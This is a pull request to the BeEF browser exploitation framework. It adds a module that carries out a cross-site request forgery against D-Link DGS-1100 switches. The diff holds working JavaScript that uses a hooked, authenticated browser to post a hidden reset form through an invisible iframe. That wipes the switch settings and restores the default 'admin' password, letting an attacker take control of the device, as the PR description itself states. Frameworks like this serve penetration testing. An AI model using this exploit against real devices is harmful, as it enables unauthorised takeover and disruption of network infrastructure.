### PR TITLE
Adding DLink DGS 1100 Switch Device Reset CSRF Module

### DIFF
--- a/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
+++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
@@ -8,22 +8,9 @@ beef.execute(function() {
   // Hooked browser must be authenticated to switch.
   var base = '<%= @base %>';
 
-  var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
-
-  var form = document.createElement('form');
-  form.setAttribute('action', base + "/cgi/reset.cgi");
-  form.setAttribute('method', 'POST');
-
-  var input = null;
-
-  input = document.createElement('input');
-  input.setAttribute('type', 'hidden');
-  input.setAttribute('name', 'reset');
-  input.setAttribute('value', 1);
-  form.appendChild(input);
-
-  dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
-  form.submit();
+  var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/reset.cgi', 'POST', 'application/x-www-form-urlencoded', [
+    { type: 'hidden', name: 'reset', value: 1 }
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 

--- a/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
+++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
@@ -1,0 +1,36 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  // Hooked browser must be authenticated to switch.
+  var base = '<%= @base %>';
+
+  var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', base + "/cgi/reset.cgi");
+  form.setAttribute('method', 'POST');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'reset');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(dlink_dgs_iframe);
+  }
+
+  setTimeout("cleanup()", 15000);
+});
+

--- a/modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml
+++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Dlink_dgs_1100_device_reset_csrf:
+            enable: true
+            category: ["Exploits", "Switch"]
+            name: "DLINK DGS 1100-08 Device Reset CSRF"
+            description: "Reset's everything on the device except for the IP address.  Default password is 'admin'"
+            authors: ["Nick Starke"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb
+++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/module.rb
@@ -1,0 +1,18 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Dlink_dgs_1100_device_reset_csrf < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://10.90.90.90'}, 
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end


### PR DESCRIPTION
Module will reset all settings on a switch except for the IP address.  In the process, it resets the default credentials, allowing a known password to be set.  The hooked browser must be authenticated to the switch for this module to work.